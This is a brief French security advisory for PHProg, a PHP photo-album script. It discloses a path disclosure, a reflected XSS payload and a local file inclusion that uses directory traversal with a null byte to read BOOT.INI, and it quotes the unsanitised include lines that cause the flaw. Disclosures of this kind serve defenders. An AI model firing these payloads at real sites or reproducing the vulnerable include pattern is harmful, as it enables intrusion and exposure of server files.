(11/09/06)<br><br>* Produit vulnérable : PHProg ( Album photo en PHP )<br><br>* Site officiel du produit : <a href="http://www.PHProg.com/">http://www.PHProg.com/</a><br><br>* Failles de sécurité décelées :<br><br>1] Full path disclosure : 
<a href="http://localhost/PHProg/?id=1&amp;album=cdg393">http://localhost/PHProg/?id=1&amp;album=cdg393</a><br><br>2] Cross Site Scripting ( XSS ) : <a href="http://localhost/PHProg/?id=1&amp;album=">http://localhost/PHProg/?id=1&amp;album=
</a>&lt;script&gt;alert('cdg393')&lt;/script&gt;<br><br>3] Local File Inclusion&nbsp; : <a href="http://localhost/PHProg/index.php?lang=../../../../../../BOOT.INI%00">http://localhost/PHProg/index.php?lang=../../../../../../BOOT.INI%00
</a><br><br>&nbsp;&nbsp;&nbsp;&nbsp; Ligne 59&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; =&gt;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $lang=$_GET['lang'];<br>&nbsp;&nbsp;&nbsp;&nbsp; Ligne 61&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; =&gt;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; include(&quot;lang/$lang.php&quot;);<br>&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &nbsp;&nbsp; &nbsp;<br>* Credits : cdg393 : 
<a href="http://cdg.new.fr">cdg.new.fr</a> =) <br><br>